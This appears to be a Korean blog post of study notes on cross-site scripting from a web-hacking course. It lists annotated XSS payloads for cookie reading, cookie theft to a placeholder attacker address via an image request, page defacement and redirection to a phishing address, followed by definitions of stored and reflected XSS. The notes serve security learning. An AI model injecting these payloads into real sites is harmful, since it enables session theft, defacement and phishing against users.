XSS 스크립트 예시
쿠키 및 세션 탈취 공격 코드
# "hello" 문자열 alert 실행
<script>alert("hello");</script>
# 현재 페이지의 쿠키(return type: string)
<script>document.cookie;</script>
# 현재 페이지의 쿠키를 인자로 가진 alert 실행
<script>alert(document.cookie);</script>
# 쿠키 생성(key: name, value: test)
<script>document.cookie = "name=test;";</script>
# new Image() 는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정.
# "공격자 주소/?cookie=현재페이지의쿠키 " 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
<script>new Image().src = "공격자 주소/?cookie= " + document.cookie;</script>
페이지 변조 공격 코드
# 이용자의 페이지 정보에 접근
<script>document;</script>
# 이용자의 페이지에 데이터를 삽입
<script>document.write("Hacked By roronoa!");</sciprt>
위치 이동 공격 코드
# 이용자의 위치를 변경, 피싱 공격 등으로 사용됨.
<script>location.href="피싱 주소"</script>
# 새 창 열기
<script>window.open("새 창 주소")</script>
Cross Site Scripting (XSS): 클라이언트 사이드 취약점, 공격자가 웹 리소스에 악성 스크립트를 삽입해 이용자의 웹 브라우저에서 해당 스크립트를 실행하는 취약점.
Stored XSS: 악성 스크립트가 서버 내에 존재, 이용자가 저장된 악성 스크립트를 조회할 때 발생
Reflected XSS: 악성 스크립트가 이용자 요청 내에 존재, 이용자가 악성 스크립트가 포함된 요청을 보낸 후 응답을 출력할 때 발생
'WEB hacking > 드림핵(dreamhack)' 카테고리의 다른 글
드림핵 xss-2 (Level1) Write up (0) | 2023.03.29 |
---|---|
드림핵 xss-1 (Level1) Write up (0) | 2023.03.25 |
드림핵 CSRF (0) | 2023.01.14 |
드림핵 cookie (Level1) Write up (0) | 2022.12.20 |
드림핵 session-basic (Level1) Write up (0) | 2022.11.24 |